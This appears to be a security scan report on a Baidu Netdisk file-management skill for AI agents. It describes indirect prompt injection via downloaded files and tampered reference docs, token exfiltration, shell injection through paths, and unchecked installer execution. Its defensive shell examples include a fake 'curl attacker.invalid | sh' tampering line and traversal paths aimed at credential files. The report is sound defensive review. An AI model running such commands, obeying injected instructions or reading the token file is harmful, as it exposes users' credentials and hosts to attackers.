The skill is highly vulnerable to prompt injection and arbitrary
Claims to do
Baidu Netdisk Storage Skill: a file-management tool for Baidu Netdisk; all operations are restricted to the `/apps/bdpan/` directory. Works with Claude Code, DuClaw, OpenClaw and others.
Actually does
This skill uses Bash, Read, Glob, Grep, and AskUserQuestion to manage files on Baidu Netdisk. It executes `bdpan` commands for listing, uploading, downloading, sharing, searching, moving, copying, renaming, and creating directories, which the skill says are confined to the `/apps/bdpan/` cloud path. It also runs local scripts (`login.sh`, `install.sh`, `update.sh`, `uninstall.sh`) and contacts `issuecdn.baidupcs.com` during installation.
`openclaw skills install may-yaha/baidu-netdisk-storage`

DeBERTa classifier detected prompt injection (confidence: 0.91)
The skill downloads files from Baidu Netdisk and processes share links from external sources. A malicious file or shared item can carry embedded instructions (indirect prompt injection); if the agent reads that content (the `Read` tool is allowed), it may act on them, overriding the constraints the skill states only in text, exfiltrating credentials, or performing unauthorized operations.
bdpan download <remote_path> <local_path> ... bdpan download "https://pan.baidu.com/s/1xxxxx?pwd=abcd" ./downloaded/
The skill references several external markdown files (bdpan-commands.md, authentication.md, examples.md, troubleshooting.md, reference/notes.md) to be loaded by the agent on demand. If these files are tampered with or replaced (e.g., via a supply chain attack on the skill directory), they could inject malicious instructions into the agent's context at runtime.
Consult as needed when the corresponding problem arises; no preloading required ... [bdpan-commands.md](./reference/bdpan-commands.md) ... [authentication.md](./reference/authentication.md)
The skill downloads `install.sh` (and, the report assumes, `update.sh`) from a Baidu CDN and executes it without any integrity check, such as comparing the download against a pinned SHA256 hash; the skill's own notes confirm that install.sh relies on HTTPS transport alone. HTTPS protects the script in transit but not against a compromised origin, so if the CDN or the script it hosts is tampered with, the result is arbitrary code execution on the agent's host.
The installer downloads from the Baidu CDN (`issuecdn.baidupcs.com`) and executes. Note: install.sh does not perform a local SHA256 check; integrity relies on HTTPS transport protection.
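The check the installer omits, shown as an added example in shell (this is not code from the bdpan skill or its install.sh): save the download to a private temp file, compare its SHA256 against a hash recorded out of band, and execute only on a match. The `install_verified` helper, the `PINNED_SHA256` placeholder and the tampered-script demonstration are constructed for this example; the genuine hash for install.sh would have to be published through a channel other than the CDN that serves the script.

```sh
#!/bin/sh
# Added example; not part of the bdpan skill or its install.sh. Pins the
# installer's SHA256 and refuses to execute a download whose hash differs.
# PINNED_SHA256 below is a stand-in for a hash obtained from a trusted source.
set -eu

# sha256_of FILE: hex digest, via sha256sum (Linux) or shasum (macOS/BSD).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED_HEX: 0 if FILE hashes to EXPECTED_HEX, 1 otherwise.
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# install_verified URL EXPECTED_HEX: the hardened form of "curl ... | sh".
# The script lands in a private temp file first, so nothing executes until the
# whole download has been hashed and checked.
install_verified() {
    url="$1"; expected="$2"
    tmp="$(mktemp)"
    # -f: HTTP errors are failures; --proto '=https': never follow a redirect
    # down to plain http, which would silently drop the transport protection.
    curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" "$url"
    if verify_sha256 "$tmp" "$expected"; then
        if sh "$tmp"; then rc=0; else rc=$?; fi
    else
        echo "refusing to execute $url: SHA256 mismatch" >&2
        rc=1
    fi
    rm -f "$tmp"
    return "$rc"
}

# Offline demonstration with a constructed installer standing in for the CDN file.
demo="$(mktemp -d)"
printf '#!/bin/sh\necho "installed"\n' > "$demo/install.sh"
PINNED_SHA256="$(sha256_of "$demo/install.sh")"   # stands in for a hash recorded out of band
verify_sha256 "$demo/install.sh" "$PINNED_SHA256" && echo "hash matches: safe to run"
# Simulate a tampered CDN response: one appended line is enough to fail the check.
printf 'curl -s http://attacker.invalid/p | sh\n' >> "$demo/install.sh"
verify_sha256 "$demo/install.sh" "$PINNED_SHA256" || echo "hash mismatch: refusing to run"
rm -rf "$demo"
```

The hash has to be pinned in the skill (or its reference notes) and updated deliberately on each installer release; a hash fetched from the same CDN at install time would be changed by the same attacker who changed the script.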
The skill leans heavily on `Bash` to run `bdpan` commands, often with user-supplied paths and arguments. It states a 'path safety' rule (路径安全) and forbids path traversal, but the content does not describe how that rule is enforced. Whether shell metacharacters in a path can become a second command depends on how the agent assembles the command line: passed as separately quoted arguments they are inert, but spliced into a command string they are injectable, and nothing in the skill pins down which of the two happens.
`allowed-tools: Bash`, `bdpan upload <local_path> <remote_path>`, `bdpan download <remote_path> <local_path>`
The `Read` tool is explicitly allowed, so the agent can read arbitrary local files. The skill's path rule covers `bdpan` remote paths only; it says nothing about what `Read` may open, so a file path under user control becomes a route to unauthorized local data access or exfiltration.
`allowed-tools: Bash, Read, Glob, Grep, AskUserQuestion`
During the large-file download flow, the agent runs `ls -l <local_path>` to check the size of the downloaded file. If `<local_path>` is not validated and can be influenced by a malicious user, the same command enumerates arbitrary files or directories on the local filesystem outside the intended scope.
`ls -l <local_path> 2>/dev/null;` within the 'poll for progress' (轮询检查进度) section.
The skill uses `nohup` for background downloads, which makes the process harder for the agent to monitor and terminate. That is unavoidable for long-running tasks, but it carries a risk of orphaned processes and unbounded resource use if the job is not tracked carefully; the skill does include polling and cleanup steps.
`nohup bdpan download ... & echo $!`
The skill instructs the agent to spawn background processes with nohup and write their output to /tmp under a predictable name (`/tmp/bdpan-dl-$$.log`, where `$$` is the PID of the launching shell). The process outlives the agent's shell, and a predictable log path in a world-writable directory invites symlink or log-injection attacks by a local attacker who can guess or influence the PID. On Linux, `fs.protected_symlinks=1` blocks following another user's symlink in a sticky directory such as /tmp, but that is a host setting the skill cannot count on.
nohup bdpan download <remote_path> <local_path> > /tmp/bdpan-dl-$$.log 2>&1 & echo $!
The skill prohibits reading ~/.config/bdpan/config.json which contains access_token credentials. However, the skill also grants broad Bash tool access. A crafted user instruction or indirect prompt injection through file content (e.g., a downloaded file containing instructions) could attempt to override this constraint and exfiltrate the token, as the constraint is only enforced by the skill's text instructions rather than a technical sandbox.
Reading or outputting the contents of `~/.config/bdpan/config.json` is prohibited (it contains sensitive credentials such as access_token)
The path rule that forbids `..` and `~` and confines operations to /apps/bdpan/ is enforced only by the LLM following the skill's text, not by a sandbox or a shell-level check. Adversarial user input or injected content can craft inputs that slip past such a soft constraint.
Path traversal (`..`, `~`) is prohibited; absolute paths outside `/apps/bdpan/` are prohibited
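A mechanical version of that rule, which also addresses the earlier findings on `Bash` with user-supplied paths and on `ls -l <local_path>` enumeration. This is an added example in shell, not part of the bdpan skill: `check_remote_path` rejects `..` components, `~` and anything outside `/apps/bdpan/` (share links on pan.baidu.com are allowed because the skill accepts them as a download source), `check_local_path` resolves the target's parent directory with symlinks followed and requires it to sit under a download root, and `safe_bdpan_download` passes the validated values to bdpan as separate arguments so that no filename can turn into a second command. The function names, `DOWNLOAD_ROOT` and the sample paths are assumptions made for this example.

```sh
#!/bin/sh
# Added example, not part of the bdpan skill: enforce the skill's path rule in
# the shell before any argument reaches bdpan, instead of trusting the model to
# honour it. DOWNLOAD_ROOT, the helper names and the sample paths are assumed.
set -eu

DOWNLOAD_ROOT="${DOWNLOAD_ROOT:-./downloaded}"   # assumed local landing directory

NL='
'

# check_remote_path PATH: 0 if PATH is inside /apps/bdpan/ or is a pan.baidu.com
# share link, 1 otherwise.
check_remote_path() {
    p="$1"
    case "$p" in
        '')                        return 1 ;;   # empty
        *"$NL"*)                   return 1 ;;   # newline: breaks logs and argument handling
        *'~'*)                     return 1 ;;   # home expansion, forbidden by the skill
        https://pan.baidu.com/s/*) return 0 ;;   # share link, host pinned
    esac
    case "/$p/" in
        */../*)                    return 1 ;;   # ".." as a path component, anywhere
    esac
    case "$p" in
        /apps/bdpan|/apps/bdpan/*) return 0 ;;   # the allowed subtree only
        *)                         return 1 ;;   # /apps/bdpanx/..., /etc/..., relative paths
    esac
}

# check_local_path PATH ROOT: 0 if PATH's parent directory resolves (symlinks
# followed) to ROOT or a directory below it, 1 otherwise. The parent must
# already exist, which a download target needs anyway.
check_local_path() {
    root="$(cd "$2" 2>/dev/null && pwd -P)" || return 1
    parent="$(cd "$(dirname "$1")" 2>/dev/null && pwd -P)" || return 1
    case "$parent/" in
        "$root/"*) return 0 ;;
        *)         return 1 ;;
    esac
}

# safe_bdpan_download REMOTE LOCAL: validate both arguments, then hand them to
# bdpan as separate words. No eval and no string splicing, so metacharacters in
# a filename stay data.
safe_bdpan_download() {
    check_remote_path "$1" || { echo "rejected remote path: $1" >&2; return 1; }
    check_local_path "$2" "$DOWNLOAD_ROOT" || { echo "rejected local path: $2" >&2; return 1; }
    bdpan download "$1" "$2"
}

# Demonstration on constructed inputs (bdpan itself is not invoked here).
for p in '/apps/bdpan/docs/report.pdf' '/apps/bdpan/../../etc/passwd' \
         '/apps/bdpanx/a.txt' '~/.config/bdpan/config.json' \
         'https://pan.baidu.com/s/1xxxxx?pwd=abcd'; do
    if check_remote_path "$p"; then echo "allow  $p"; else echo "reject $p"; fi
done
```

The local check resolves through symlinks on purpose: a link placed inside the download directory that points at `/` would otherwise let `<local_path>` (and the `ls -l` that follows it) reach anywhere on the host while still looking like a path under the root.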
The skill instructs the agent to poll a background download every 30 seconds without a maximum number of retries or an overall timeout. For a very large file or a hung process, the agent can sit in the polling loop indefinitely, a resource and autonomy abuse pattern.
# 2. Poll for progress (check every 30 seconds, using Bash run_in_background)
The note '内测阶段' (internal testing phase) could subtly influence human overseers or developers to be less critical of potential issues, framing them as expected imperfections in an early development stage.
> Internal testing phase; see [reference/notes.md](./reference/notes.md) for usage notes
[![Mondoo Skill Check](https://mondoo.com/ai-agent-security/api/badge/clawhub/may-yaha/baidu-netdisk-storage.svg)](https://mondoo.com/ai-agent-security/skills/clawhub/may-yaha/baidu-netdisk-storage)